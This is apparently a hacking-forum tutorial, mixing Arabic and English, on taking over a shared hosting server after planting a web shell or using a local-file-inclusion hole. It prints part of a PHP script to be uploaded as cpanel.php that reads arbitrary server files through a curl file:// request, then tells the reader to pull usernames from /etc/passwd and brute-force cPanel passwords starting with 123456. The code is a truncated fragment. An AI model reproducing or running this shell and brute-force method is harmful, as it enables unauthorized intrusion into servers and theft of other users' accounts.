سنتكلم اليوم عن اختاق السيرفر بعد رفعك شل على المواقع او من خلال ثغره لوكل فايل استطعت الحصول على اليوزاتا حق المواقع لسيرفر معين طيب بقى الباسورادت باماكنك تخمينها بشكل رائع وبسكربت مجرب طبعا ترفع هذا الملف وتسميه cpanel.php
for($a=0;$a<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) @mkdir($hardstyle[$a]); @chdir($hardstyle[$a]); $level++; } } while($level--) chdir(".."); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "file:file:///".$file); echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: black; color:#C0C0C0' >"; if(FALSE==curl_exec($ch)) die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); echo ' </textarea> </FONT>'; curl_close($ch); print '</table>'; } ?>save as cpanel.php and upload to the website and locate the shell
lets see etc/passwd file first
هذا شكل السكربت بعد الرفع to get only users from the file ,after getting users only go to brute option and paste the users list in password field start with123456 and click BRUTE BOOM u get password with username